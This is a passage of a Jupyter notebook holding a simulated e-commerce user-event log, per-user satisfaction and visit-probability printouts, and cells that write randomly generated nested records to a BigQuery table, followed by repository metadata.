04:17:51.686658\n\nUSER: 7\nvisit 2021-04-09 04:18:44.686658\n\nUSER: 8\nvisit 2021-04-09 04:19:45.686658\nsearch 2021-04-09 04:19:50.686658\nview_item 2021-04-09 04:20:07.686658\nview_item 2021-04-09 04:20:19.686658\nsearch 2021-04-09 04:20:42.686658\nview_item 2021-04-09 04:22:38.686658\ncreate_account 2021-04-09 04:23:04.686658\nsearch 2021-04-09 04:23:49.686658\nsearch 2021-04-09 04:25:38.686658\nsearch 2021-04-09 04:26:51.686658\n\nUSER: 9\nvisit 2021-04-09 04:20:46.686658\nsearch 2021-04-09 04:20:58.686658\nsearch 2021-04-09 04:21:51.686658\nsearch 2021-04-09 04:23:40.686658\n\nUSER: 10\nvisit 2021-04-09 04:21:47.686658\n\nUSER: 11\nvisit 2021-04-09 04:22:48.686658\n\nUSER: 12\nvisit 2021-04-09 04:23:49.686658\n\nUSER: 13\nvisit 2021-04-09 04:24:50.686658\ncreate_account 2021-04-09 04:24:59.686658\nlist_item 2021-04-09 04:26:03.686658\n\nUSER: 14\nvisit 2021-04-09 04:25:51.686658\nsearch 2021-04-09 04:26:06.686658\nview_item 2021-04-09 04:27:29.686658\n\nUSER: 15\nvisit 2021-04-09 04:26:52.686658\n\nUSER: 16\nvisit 2021-04-09 04:27:53.686658\ncreate_account 2021-04-09 04:28:06.686658\nsearch 2021-04-09 04:28:58.686658\nview_item 2021-04-09 04:30:13.686658\nsearch 2021-04-09 04:30:30.686658\nview_item 2021-04-09 04:32:06.686658\nview_item 2021-04-09 04:32:22.686658\nview_item 2021-04-09 04:32:50.686658\nview_item 2021-04-09 04:33:05.686658\nsend_message 2021-04-09 04:33:19.686658\nsearch 2021-04-09 04:33:38.686658\nsearch 2021-04-09 04:34:23.686658\nview_item 2021-04-09 04:35:34.686658\n\nUSER: 17\nvisit 2021-04-09 04:28:54.686658\n\nUSER: 18\nvisit 2021-04-09 04:29:55.686658\nsearch 2021-04-09 04:30:01.686658\nsearch 2021-04-09 04:31:59.686658\nsearch 2021-04-09 04:32:21.686658\nview_item 2021-04-09 04:33:09.686658\n\nUSER: 19\nvisit 2021-04-09 04:30:56.686658\nsearch 2021-04-09 04:31:07.686658\nsearch 2021-04-09 04:32:23.686658\nsearch 2021-04-09 04:33:07.686658\ncreate_account 2021-04-09 04:34:26.686658\nsearch 2021-04-09 04:35:11.686658\n\nUSER: 20\nvisit 2021-04-09 04:31:57.686658\nsearch 2021-04-09 04:31:59.686658\ncreate_account 2021-04-09 04:32:12.686658\nlist_item 2021-04-09 04:33:57.686658\n\nUSER: 21\nvisit 2021-04-09 04:32:58.686658\n\nUSER: 22\nvisit 2021-04-09 04:33:59.686658\nsearch 2021-04-09 04:34:08.686658\nsearch 2021-04-09 04:34:25.686658\nview_item 2021-04-09 04:36:01.686658\nview_item 2021-04-09 04:36:28.686658\ncreate_account 2021-04-09 04:36:41.686658\nsearch 2021-04-09 04:38:26.686658\n\nUSER: 23\nvisit 2021-04-09 04:35:00.686658\nsearch 2021-04-09 04:35:05.686658\n\nUSER: 24\nvisit 2021-04-09 04:36:01.686658\n\nUSER: 25\nvisit 2021-04-09 04:37:02.686658\nsearch 2021-04-09 04:37:04.686658\nview_item 2021-04-09 04:38:10.686658\nview_item 2021-04-09 04:38:37.686658\ncreate_account 2021-04-09 04:38:55.686658\nsearch 2021-04-09 04:40:00.686658\n\nUSER: 26\nvisit 2021-04-09 04:38:03.686658\n\nUSER: 27\nvisit 2021-04-09 04:39:04.686658\nsearch 2021-04-09 04:39:16.686658\nview_item 2021-04-09 04:40:15.686658\ncreate_account 2021-04-09 04:40:38.686658\nsearch 2021-04-09 04:43:03.686658\nview_item 2021-04-09 04:44:23.686658\nadd_to_basket 2021-04-09 04:44:46.686658\nsearch 2021-04-09 04:45:04.686658\nview_item 2021-04-09 04:46:47.686658\nsend_message 2021-04-09 04:47:10.686658\nview_item 2021-04-09 04:47:34.686658\nopen_basket 2021-04-09 04:48:03.686658\n\nUSER: 28\nvisit 2021-04-09 04:40:05.686658\ncreate_account 2021-04-09 04:40:15.686658\nlist_item 2021-04-09 04:41:24.686658\n\nUSER: 29\nvisit 2021-04-09 04:41:06.686658\n\nUSER: 30\nvisit 2021-04-09 04:42:07.686658\ncreate_account 2021-04-09 04:42:09.686658\nsearch 2021-04-09 04:44:22.686658\n\nUSER: 31\nvisit 2021-04-09 04:43:08.686658\nsearch 2021-04-09 04:43:21.686658\nview_item 2021-04-09 04:44:18.686658\ncreate_account 2021-04-09 04:44:42.686658\nsearch 2021-04-09 04:45:26.686658\nsearch 2021-04-09 04:46:39.686658\nsearch 2021-04-09 04:47:01.686658\nview_item 2021-04-09 04:48:35.686658\nview_item 2021-04-09 04:48:53.686658\n\nUSER: 32\nvisit 2021-04-09 04:44:09.686658\ncreate_account 2021-04-09 04:44:22.686658\nsearch 2021-04-09 04:46:04.686658\nsearch 2021-04-09 04:47:29.686658\n\nUSER: 33\nvisit 2021-04-09 04:45:10.686658\nsearch 2021-04-09 04:45:20.686658\nview_item 2021-04-09 04:46:16.686658\ncreate_account 2021-04-09 04:46:29.686658\n\nUSER: 34\nvisit 2021-04-09 04:46:11.686658\nsearch 2021-04-09 04:46:17.686658\nview_item 2021-04-09 04:46:57.686658\n\nUSER: 35\nvisit 2021-04-09 04:47:12.686658\nsearch 2021-04-09 04:47:27.686658\nsearch 2021-04-09 04:48:41.686658\nview_item 2021-04-09 04:50:30.686658\nview_item 2021-04-09 04:50:53.686658\ncreate_account 2021-04-09 04:51:16.686658\nsearch 2021-04-09 04:53:19.686658\nview_item 2021-04-09 04:54:41.686658\n\nUSER: 36\nvisit 2021-04-09 04:48:13.686658\nsearch 2021-04-09 04:48:28.686658\nview_item 2021-04-09 04:49:05.686658\ncreate_account 2021-04-09 04:49:20.686658\n\nUSER: 37\nvisit 2021-04-09 04:49:14.686658\ncreate_account 2021-04-09 04:49:31.686658\nlist_item 2021-04-09 04:50:05.686658\nsearch 2021-04-09 04:54:29.686658\nsearch 2021-04-09 04:55:22.686658\nsearch 2021-04-09 04:57:19.686658\nsearch 2021-04-09 04:58:53.686658\nsearch 2021-04-09 04:59:40.686658\nview_item 2021-04-09 05:00:57.686658\nview_item 2021-04-09 05:01:26.686658\nsearch 2021-04-09 05:01:47.686658\nview_item 2021-04-09 05:02:31.686658\nview_item 2021-04-09 05:02:59.686658\n\nUSER: 38\nvisit 2021-04-09 04:50:15.686658\n\nUSER: 39\nvisit 2021-04-09 04:51:16.686658\nsearch 2021-04-09 04:51:25.686658\n\nUSER: 40\nvisit 2021-04-09 04:52:17.686658\n\nUSER: 41\nvisit 2021-04-09 04:53:18.686658\ncreate_account 2021-04-09 04:53:23.686658\nsearch 2021-04-09 04:54:22.686658\nview_item 2021-04-09 04:55:06.686658\nview_item 2021-04-09 04:55:19.686658\nsearch 2021-04-09 04:55:31.686658\nsearch 2021-04-09 04:55:51.686658\nview_item 2021-04-09 04:56:06.686658\nview_item 2021-04-09 04:56:32.686658\nadd_to_basket 2021-04-09 04:56:47.686658\n\nUSER: 42\nvisit 2021-04-09 04:54:19.686658\nsearch 2021-04-09 04:54:20.686658\nview_item 2021-04-09 04:56:09.686658\nview_item 2021-04-09 04:56:24.686658\ncreate_account 2021-04-09 04:56:50.686658\nsearch 2021-04-09 04:59:05.686658\n\nUSER: 43\nvisit 2021-04-09 04:55:20.686658\nsearch 2021-04-09 04:55:24.686658\nsearch 2021-04-09 04:57:16.686658\n\nUSER: 44\nvisit 2021-04-09 04:56:21.686658\n\nUSER: 45\nvisit 2021-04-09 04:57:22.686658\nsearch 2021-04-09 04:57:26.686658\ncreate_account 2021-04-09 04:58:02.686658\nsearch 2021-04-09 04:58:59.686658\nview_item 2021-04-09 05:00:21.686658\n\nUSER: 46\nvisit 2021-04-09 04:58:23.686658\ncreate_account 2021-04-09 04:58:27.686658\n\nUSER: 47\nvisit 2021-04-09 04:59:24.686658\ncreate_account 2021-04-09 04:59:29.686658\nsearch 2021-04-09 05:00:22.686658\nview_item 2021-04-09 05:01:46.686658\n\nUSER: 48\nvisit 2021-04-09 05:00:25.686658\nsearch 2021-04-09 05:00:40.686658\nsearch 2021-04-09 05:02:33.686658\ncreate_account 2021-04-09 05:02:57.686658\nsearch 2021-04-09 05:04:34.686658\nsearch 2021-04-09 05:05:16.686658\nsearch 2021-04-09 05:05:38.686658\nsearch 2021-04-09 05:07:32.686658\nview_item 2021-04-09 05:08:27.686658\nview_item 2021-04-09 05:08:55.686658\nview_item 2021-04-09 05:09:21.686658\nadd_to_basket 2021-04-09 05:09:45.686658\nsearch 2021-04-09 05:10:34.686658\nview_item 2021-04-09 05:12:32.686658\nsend_message 2021-04-09 05:12:53.686658\nopen_basket 2021-04-09 05:13:06.686658\npay 2021-04-09 05:14:37.686658\n\nUSER: 49\nvisit 2021-04-09 05:01:26.686658\n\nUSER: 50\nvisit 2021-04-09 05:02:27.686658\ncreate_account 2021-04-09 05:02:43.686658\nsearch 2021-04-09 05:04:04.686658\nview_item 2021-04-09 05:04:21.686658\nview_item 2021-04-09 05:04:35.686658\nsend_message 2021-04-09 05:04:56.686658\nview_item 2021-04-09 05:05:19.686658\nlist_item 2021-04-09 05:05:48.686658\n\nUSER: 51\nvisit 2021-04-09 05:03:28.686658\n\nUSER: 52\nvisit 2021-04-09 05:04:29.686658\n\nUSER: 53\nvisit 2021-04-09 05:05:30.686658\nsearch 2021-04-09 05:05:46.686658\nview_item 2021-04-09 05:06:01.686658\nsearch 2021-04-09 05:06:18.686658\nsearch 2021-04-09 05:07:44.686658\n\nUSER: 54\nvisit 2021-04-09 05:06:31.686658\n\nUSER: 55\nvisit 2021-04-09 05:07:32.686658\nsearch 2021-04-09 05:07:32.686658\nsearch 2021-04-09 05:07:46.686658\n\nUSER: 56\nvisit 2021-04-09 05:08:33.686658\ncreate_account 2021-04-09 05:08:52.686658\n\nUSER: 57\nvisit 2021-04-09 05:09:34.686658\ncreate_account 2021-04-09 05:09:44.686658\nsearch 2021-04-09 05:11:12.686658\nview_item 2021-04-09 05:13:02.686658\nsend_message 2021-04-09 05:13:28.686658\n\nUSER: 58\nvisit 2021-04-09 05:10:35.686658\ncreate_account 2021-04-09 05:10:41.686658\nsearch 2021-04-09 05:13:02.686658\n\nUSER: 59\nvisit 2021-04-09 05:11:36.686658\n\nUSER: 60\nvisit 2021-04-09 05:12:37.686658\nsearch 2021-04-09 05:12:48.686658\nsearch 2021-04-09 05:13:36.686658\nview_item 2021-04-09 05:15:32.686658\n\nUSER: 61\nvisit 2021-04-09 05:13:38.686658\n\nUSER: 62\nvisit 2021-04-09 05:14:39.686658\nsearch 2021-04-09 05:14:45.686658\nview_item 2021-04-09 05:16:29.686658\ncreate_account 2021-04-09 05:16:39.686658\nsearch 2021-04-09 05:17:23.686658\nview_item 2021-04-09 05:19:15.686658\nsearch 2021-04-09 05:19:29.686658\n\nUSER: 63\nvisit 2021-04-09 05:15:40.686658\nsearch 2021-04-09 05:15:51.686658\nview_item 2021-04-09 05:16:51.686658\ncreate_account 2021-04-09 05:17:06.686658\nsearch 2021-04-09 05:19:21.686658\nsearch 2021-04-09 05:19:36.686658\nview_item 2021-04-09 05:20:41.686658\nview_item 2021-04-09 05:21:05.686658\nsend_message 2021-04-09 05:21:31.686658\nview_item 2021-04-09 05:21:43.686658\n\nUSER: 64\nvisit 2021-04-09 05:16:41.686658\ncreate_account 2021-04-09 05:16:49.686658\nsearch 2021-04-09 05:19:12.686658\nsearch 2021-04-09 05:20:19.686658\nview_item 2021-04-09 05:21:04.686658\nsend_message 2021-04-09 05:21:30.686658\nview_item 2021-04-09 05:21:42.686658\n\nUSER: 65\nvisit 2021-04-09 05:17:42.686658\ncreate_account 2021-04-09 05:17:45.686658\nsearch 2021-04-09 05:19:33.686658\n\nUSER: 66\nvisit 2021-04-09 05:18:43.686658\ncreate_account 2021-04-09 05:18:46.686658\nlist_item 2021-04-09 05:20:21.686658\n\nUSER: 67\nvisit 2021-04-09 05:19:44.686658\nsearch 2021-04-09 05:20:03.686658\ncreate_account 2021-04-09 05:20:20.686658\nsearch 2021-04-09 05:22:20.686658\nview_item 2021-04-09 05:24:16.686658\nsearch 2021-04-09 05:24:28.686658\nview_item 2021-04-09 05:26:24.686658\nview_item 2021-04-09 05:26:50.686658\nadd_to_basket 2021-04-09 05:27:00.686658\nopen_basket 2021-04-09 05:27:14.686658\npay 2021-04-09 05:27:30.686658\n\nUSER: 68\nvisit 2021-04-09 05:20:45.686658\nsearch 2021-04-09 05:20:49.686658\nview_item 2021-04-09 05:22:05.686658\ncreate_account 2021-04-09 05:22:19.686658\nsearch 2021-04-09 05:24:44.686658\nview_item 2021-04-09 05:25:52.686658\nview_item 2021-04-09 05:26:12.686658\nadd_to_basket 2021-04-09 05:26:41.686658\nopen_basket 2021-04-09 05:28:21.686658\nremove_from_basket 2021-04-09 05:30:16.686658\nsearch 2021-04-09 05:30:32.686658\nsearch 2021-04-09 05:30:58.686658\nsearch 2021-04-09 05:32:40.686658\nview_item 2021-04-09 05:33:29.686658\n\nUSER: 69\nvisit 2021-04-09 05:21:46.686658\nsearch 2021-04-09 05:21:55.686658\nview_item 2021-04-09 05:22:35.686658\nview_item 2021-04-09 05:23:01.686658\nview_item 2021-04-09 05:23:14.686658\nview_item 2021-04-09 05:23:40.686658\nview_item 2021-04-09 05:24:03.686658\ncreate_account 2021-04-09 05:24:18.686658\nsearch 2021-04-09 05:26:26.686658\n\nUSER: 70\nvisit 2021-04-09 05:22:47.686658\nsearch 2021-04-09 05:23:05.686658\nsearch 2021-04-09 05:24:03.686658\nview_item 2021-04-09 05:25:22.686658\nsearch 2021-04-09 05:25:41.686658\nsearch 2021-04-09 05:27:39.686658\nsearch 2021-04-09 05:28:28.686658\nsearch 2021-04-09 05:29:24.686658\n\nUSER: 71\nvisit 2021-04-09 05:23:48.686658\ncreate_account 2021-04-09 05:23:51.686658\nsearch 2021-04-09 05:25:29.686658\nsearch 2021-04-09 05:25:44.686658\nview_item 2021-04-09 05:26:12.686658\nsend_message 2021-04-09 05:26:41.686658\n\nUSER: 72\nvisit 2021-04-09 05:24:49.686658\nsearch 2021-04-09 05:25:03.686658\nsearch 2021-04-09 05:25:29.686658\nsearch 2021-04-09 05:25:39.686658\nsearch 2021-04-09 05:27:37.686658\nsearch 2021-04-09 05:28:26.686658\nsearch 2021-04-09 05:29:22.686658\n\nUSER: 73\nvisit 2021-04-09 05:25:50.686658\n\nUSER: 74\nvisit 2021-04-09 05:26:51.686658\nsearch 2021-04-09 05:26:53.686658\nview_item 2021-04-09 05:27:11.686658\nsearch 2021-04-09 05:27:38.686658\nsearch 2021-04-09 05:29:03.686658\n\nUSER: 75\nvisit 2021-04-09 05:27:52.686658\nsearch 2021-04-09 05:27:53.686658\n\nUSER: 76\nvisit 2021-04-09 05:28:53.686658\ncreate_account 2021-04-09 05:28:57.686658\nsearch 2021-04-09 05:30:03.686658\nview_item 2021-04-09 05:31:05.686658\nsearch 2021-04-09 05:31:26.686658\nsearch 2021-04-09 05:32:10.686658\n\nUSER: 77\nvisit 2021-04-09 05:29:54.686658\nsearch 2021-04-09 05:30:01.686658\nview_item 2021-04-09 05:31:49.686658\nview_item 2021-04-09 05:32:04.686658\nsearch 2021-04-09 05:32:18.686658\nview_item 2021-04-09 05:33:17.686658\nview_item 2021-04-09 05:33:44.686658\nview_item 2021-04-09 05:34:12.686658\ncreate_account 2021-04-09 05:34:37.686658\nsearch 2021-04-09 05:36:20.686658\nview_item 2021-04-09 05:37:03.686658\n\nUSER: 78\nvisit 2021-04-09 05:30:55.686658\nsearch 2021-04-09 05:30:57.686658\nview_item 2021-04-09 05:31:30.686658\ncreate_account 2021-04-09 05:31:51.686658\nsearch 2021-04-09 05:32:31.686658\nview_item 2021-04-09 05:33:11.686658\nview_item 2021-04-09 05:33:34.686658\nadd_to_basket 2021-04-09 05:33:52.686658\nopen_basket 2021-04-09 05:34:14.686658\npay 2021-04-09 05:34:20.686658\n\nUSER: 79\nvisit 2021-04-09 05:31:56.686658\n\nUSER: 80\nvisit 2021-04-09 05:32:57.686658\ncreate_account 2021-04-09 05:33:10.686658\nsearch 2021-04-09 05:33:47.686658\nview_item 2021-04-09 05:34:20.686658\nview_item 2021-04-09 05:34:33.686658\nsearch 2021-04-09 05:34:46.686658\nsearch 2021-04-09 05:36:22.686658\nview_item 2021-04-09 05:37:17.686658\n\nUSER: 81\nvisit 2021-04-09 05:33:58.686658\nsearch 2021-04-09 05:34:11.686658\ncreate_account 2021-04-09 05:34:22.686658\nsearch 2021-04-09 05:35:03.686658\nsearch 2021-04-09 05:36:51.686658\nsearch 2021-04-09 05:38:40.686658\nview_item 2021-04-09 05:38:58.686658\nview_item 2021-04-09 05:39:12.686658\n\nUSER: 82\nvisit 2021-04-09 05:34:59.686658\nsearch 2021-04-09 05:35:13.686658\nview_item 2021-04-09 05:36:33.686658\ncreate_account 2021-04-09 05:36:54.686658\nsearch 2021-04-09 05:37:36.686658\nsearch 2021-04-09 05:38:53.686658\nsearch 2021-04-09 05:40:21.686658\nsearch 2021-04-09 05:40:36.686658\nview_item 2021-04-09 05:41:23.686658\n\nUSER: 83\nvisit 2021-04-09 05:36:00.686658\nsearch 2021-04-09 05:36:13.686658\nview_item 2021-04-09 05:36:34.686658\ncreate_account 2021-04-09 05:36:44.686658\nsearch 2021-04-09 05:38:21.686658\nlist_item 2021-04-09 05:39:47.686658\n\nUSER: 84\nvisit 2021-04-09 05:37:01.686658\nsearch 2021-04-09 05:37:17.686658\nview_item 2021-04-09 05:38:45.686658\nview_item 2021-04-09 05:38:58.686658\nview_item 2021-04-09 05:39:25.686658\n\nUSER: 85\nvisit 2021-04-09 05:38:02.686658\nsearch 2021-04-09 05:38:13.686658\nsearch 2021-04-09 05:39:27.686658\nview_item 2021-04-09 05:41:26.686658\nview_item 2021-04-09 05:41:55.686658\nsearch 2021-04-09 05:42:07.686658\nview_item 2021-04-09 05:42:18.686658\nview_item 2021-04-09 05:42:35.686658\ncreate_account 2021-04-09 05:43:04.686658\nsearch 2021-04-09 05:44:44.686658\nview_item 2021-04-09 05:46:25.686658\n\nUSER: 86\nvisit 2021-04-09 05:39:03.686658\ncreate_account 2021-04-09 05:39:15.686658\nlist_item 2021-04-09 05:41:40.686658\n\nUSER: 87\nvisit 2021-04-09 05:40:04.686658\nsearch 2021-04-09 05:40:14.686658\nview_item 2021-04-09 05:41:37.686658\nsearch 2021-04-09 05:42:03.686658\ncreate_account 2021-04-09 05:43:23.686658\nsearch 2021-04-09 05:45:12.686658\nview_item 2021-04-09 05:45:57.686658\nsearch 2021-04-09 05:46:20.686658\nview_item 2021-04-09 05:47:52.686658\nadd_to_basket 2021-04-09 05:48:11.686658\nopen_basket 2021-04-09 05:48:38.686658\nremove_from_basket 2021-04-09 05:50:26.686658\nsearch 2021-04-09 05:50:34.686658\nview_item 2021-04-09 05:52:15.686658\nadd_to_basket 2021-04-09 05:52:36.686658\nview_item 2021-04-09 05:53:33.686658\n\nUSER: 88\nvisit 2021-04-09 05:41:05.686658\nsearch 2021-04-09 05:41:11.686658\nsearch 2021-04-09 05:42:55.686658\nview_item 2021-04-09 05:43:35.686658\n\nUSER: 89\nvisit 2021-04-09 05:42:06.686658\n\nUSER: 90\nvisit 2021-04-09 05:43:07.686658\nsearch 2021-04-09 05:43:26.686658\n\nUSER: 91\nvisit 2021-04-09 05:44:08.686658\nsearch 2021-04-09 05:44:14.686658\nsearch 2021-04-09 05:45:27.686658\nview_item 2021-04-09 05:47:21.686658\nview_item 2021-04-09 05:47:41.686658\nsearch 2021-04-09 05:47:56.686658\nview_item 2021-04-09 05:48:33.686658\ncreate_account 2021-04-09 05:48:48.686658\nsearch 2021-04-09 05:50:34.686658\nsearch 2021-04-09 05:51:14.686658\nview_item 2021-04-09 05:52:21.686658\nview_item 2021-04-09 05:52:48.686658\nview_item 2021-04-09 05:53:03.686658\n\nUSER: 92\nvisit 2021-04-09 05:45:09.686658\n\nUSER: 93\nvisit 2021-04-09 05:46:10.686658\nsearch 2021-04-09 05:46:16.686658\nview_item 2021-04-09 05:47:26.686658\ncreate_account 2021-04-09 05:47:52.686658\nsearch 2021-04-09 05:49:28.686658\nsearch 2021-04-09 05:51:10.686658\nsearch 2021-04-09 05:52:46.686658\nsearch 2021-04-09 05:53:28.686658\nview_item 2021-04-09 05:53:48.686658\nadd_to_basket 2021-04-09 05:54:04.686658\nview_item 2021-04-09 05:54:41.686658\nsearch 2021-04-09 05:54:55.686658\nsearch 2021-04-09 05:55:15.686658\nopen_basket 2021-04-09 05:56:25.686658\npay 2021-04-09 05:58:20.686658\n\nUSER: 94\nvisit 2021-04-09 05:47:11.686658\n\nUSER: 95\nvisit 2021-04-09 05:48:12.686658\ncreate_account 2021-04-09 05:48:28.686658\nsearch 2021-04-09 05:49:08.686658\nview_item 2021-04-09 05:49:38.686658\nsearch 2021-04-09 05:49:51.686658\n\nUSER: 96\nvisit 2021-04-09 05:49:13.686658\ncreate_account 2021-04-09 05:49:21.686658\n\nUSER: 97\nvisit 2021-04-09 05:50:14.686658\n\nUSER: 98\nvisit 2021-04-09 05:51:15.686658\nsearch 2021-04-09 05:51:32.686658\nview_item 2021-04-09 05:52:04.686658\ncreate_account 2021-04-09 05:52:25.686658\nsearch 2021-04-09 05:53:50.686658\nview_item 2021-04-09 05:55:31.686658\nsearch 2021-04-09 05:55:44.686658\n\nUSER: 99\nvisit 2021-04-09 05:52:16.686658\nsearch 2021-04-09 05:52:28.686658\n\nUSER: 100\nvisit 2021-04-09 05:53:17.686658\n" ], [ "for user_id in users.keys():\n if user_id != 1:\n print(f'user_id: {user_id}, satisfaction: {users[user_id].satisfaction}, visit probability: {users[user_id].visit_probability}')", "user_id: 2, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 3, satisfaction: 0, visit probability: 0.01\nuser_id: 4, satisfaction: 0, visit probability: 0.01\nuser_id: 5, satisfaction: -5, visit probability: 0.005\nuser_id: 6, satisfaction: 10, visit probability: 0.02\nuser_id: 7, satisfaction: 0, visit probability: 0.01\nuser_id: 8, satisfaction: 2, visit probability: 0.012\nuser_id: 9, satisfaction: -3, visit probability: 0.007\nuser_id: 10, satisfaction: 0, visit probability: 0.01\nuser_id: 11, satisfaction: 0, visit probability: 0.01\nuser_id: 12, satisfaction: 0, visit probability: 0.01\nuser_id: 13, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 14, satisfaction: -2, visit probability: 0.008\nuser_id: 15, satisfaction: 0, visit probability: 0.01\nuser_id: 16, satisfaction: 1, visit probability: 0.011\nuser_id: 17, satisfaction: 0, visit probability: 0.01\nuser_id: 18, satisfaction: -4, visit probability: 0.006\nuser_id: 19, satisfaction: 6, visit probability: 0.016\nuser_id: 20, satisfaction: 10, visit probability: 0.02\nuser_id: 21, satisfaction: 0, visit probability: 0.01\nuser_id: 22, satisfaction: 5, visit probability: 0.015\nuser_id: 23, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 24, satisfaction: 0, visit probability: 0.01\nuser_id: 25, satisfaction: 6, visit probability: 0.016\nuser_id: 26, satisfaction: 0, visit probability: 0.01\nuser_id: 27, satisfaction: 4, visit probability: 0.014\nuser_id: 28, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 29, satisfaction: 0, visit probability: 0.01\nuser_id: 30, satisfaction: 9, visit probability: 0.019\nuser_id: 31, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 32, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 33, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 34, satisfaction: -2, visit probability: 0.008\nuser_id: 35, satisfaction: 4, visit probability: 0.014\nuser_id: 36, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 37, satisfaction: 1, visit probability: 0.011\nuser_id: 38, satisfaction: 0, visit probability: 0.01\nuser_id: 39, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 40, satisfaction: 0, visit probability: 0.01\nuser_id: 41, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 42, satisfaction: 6, visit probability: 0.016\nuser_id: 43, satisfaction: -2, visit probability: 0.008\nuser_id: 44, satisfaction: 0, visit probability: 0.01\nuser_id: 45, satisfaction: 7, visit probability: 0.017\nuser_id: 46, satisfaction: 10, visit probability: 0.02\nuser_id: 47, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 48, satisfaction: 20, visit probability: 0.03\nuser_id: 49, satisfaction: 0, visit probability: 0.01\nuser_id: 50, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 51, satisfaction: 0, visit probability: 0.01\nuser_id: 52, satisfaction: 0, visit probability: 0.01\nuser_id: 53, satisfaction: -4, visit probability: 0.006\nuser_id: 54, satisfaction: 0, visit probability: 0.01\nuser_id: 55, satisfaction: -2, visit probability: 0.008\nuser_id: 56, satisfaction: 10, visit probability: 0.02\nuser_id: 57, satisfaction: 9, visit probability: 0.019\nuser_id: 58, satisfaction: 9, visit probability: 0.019\nuser_id: 59, satisfaction: 0, visit probability: 0.01\nuser_id: 60, satisfaction: -3, visit probability: 0.007\nuser_id: 61, satisfaction: 0, visit probability: 0.01\nuser_id: 62, satisfaction: 5, visit probability: 0.015\nuser_id: 63, satisfaction: 4, visit probability: 0.014\nuser_id: 64, satisfaction: 7, visit probability: 0.017\nuser_id: 65, satisfaction: 9, visit probability: 0.019\nuser_id: 66, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 67, satisfaction: 24, visit probability: 0.034\nuser_id: 68, satisfaction: 1, visit probability: 0.011\nuser_id: 69, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 70, satisfaction: -7, visit probability: 0.003\nuser_id: 71, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 72, satisfaction: -6, visit probability: 0.004\nuser_id: 73, satisfaction: 0, visit probability: 0.01\nuser_id: 74, satisfaction: -4, visit probability: 0.006\nuser_id: 75, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 76, satisfaction: 6, visit probability: 0.016\nuser_id: 77, satisfaction: 1, visit probability: 0.011\nuser_id: 78, satisfaction: 25, visit probability: 0.035\nuser_id: 79, satisfaction: 0, visit probability: 0.01\nuser_id: 80, satisfaction: 4, visit probability: 0.014\nuser_id: 81, satisfaction: 4, visit probability: 0.014\nuser_id: 82, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 83, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 84, satisfaction: -4, visit probability: 0.006\nuser_id: 85, satisfaction: 1, visit probability: 0.011\nuser_id: 86, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 87, satisfaction: 0, visit probability: 0.01\nuser_id: 88, satisfaction: -3, visit probability: 0.007\nuser_id: 89, satisfaction: 0, visit probability: 0.01\nuser_id: 90, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 91, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 92, satisfaction: 0, visit probability: 0.01\nuser_id: 93, satisfaction: 20, visit probability: 0.03\nuser_id: 94, satisfaction: 0, visit probability: 0.01\nuser_id: 95, satisfaction: 7, visit probability: 0.017\nuser_id: 96, satisfaction: 10, visit probability: 0.02\nuser_id: 97, satisfaction: 0, visit probability: 0.01\nuser_id: 98, satisfaction: 5, visit probability: 0.015\nuser_id: 99, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 100, satisfaction: 0, visit probability: 0.01\n" ], [ "users[31].registered", "_____no_output_____" ] ], [ [ "## Writing data to bigquery", "_____no_output_____" ] ], [ [ "from google.cloud import storage\nfrom google.cloud import bigquery\n\nimport sys\nimport os", "_____no_output_____" ], [ "bigquery_client = bigquery.Client.from_service_account_json('../../credentials/data-analysis-sql-309220-6ce084250abd.json')", "_____no_output_____" ], [ "countries = ['UK', 'DE', 'AT']\ncountries_probs = [0.5, 0.4, 0.1]\n\nagents = ['android', 'ios', 'web']\nagents_probs = [0.4, 0.3, 0.3]\n\nrand = np.random.default_rng(seed=1)\n\nobjects = []\nfor i in range(1000):\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n object = {\n 'timestamp': timestamp,\n 'id': str(hash(timestamp)),\n 'nested': {\n 'os': rand.choice(a=agents, p=agents_probs),\n 'country': rand.choice(a=countries, p=countries_probs)\n }\n }\n \n objects.append(object)\n \n time.sleep(0.01)", "_____no_output_____" ], [ "bq_error = bigquery_client.insert_rows_json('data-analysis-sql-309220.synthetic.nested_test', objects)\nif bq_error != []:\n print(bq_error) ", "_____no_output_____" ] ] ]
[ "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
cb1fe444b37b84461e9e3e38eaee1db51503f708
6,644
ipynb
Jupyter Notebook
21-Big-Data-and-Spark/01-Introduction to Spark and Python.ipynb
atse0612/Python-for-Data-Science-and-Machine-Learning-Bootcamp
56687174b2b62feb3482940bf8ea1638a366df09
[ "MIT" ]
null
null
null
21-Big-Data-and-Spark/01-Introduction to Spark and Python.ipynb
atse0612/Python-for-Data-Science-and-Machine-Learning-Bootcamp
56687174b2b62feb3482940bf8ea1638a366df09
[ "MIT" ]
9
2020-09-25T21:49:09.000Z
2022-02-10T01:24:14.000Z
21-Big-Data-and-Spark/01-Introduction to Spark and Python.ipynb
atse0612/Python-for-Data-Science-and-Machine-Learning-Bootcamp
56687174b2b62feb3482940bf8ea1638a366df09
[ "MIT" ]
2
2020-08-17T17:54:20.000Z
2020-09-06T04:10:05.000Z
23.644128
424
0.568031
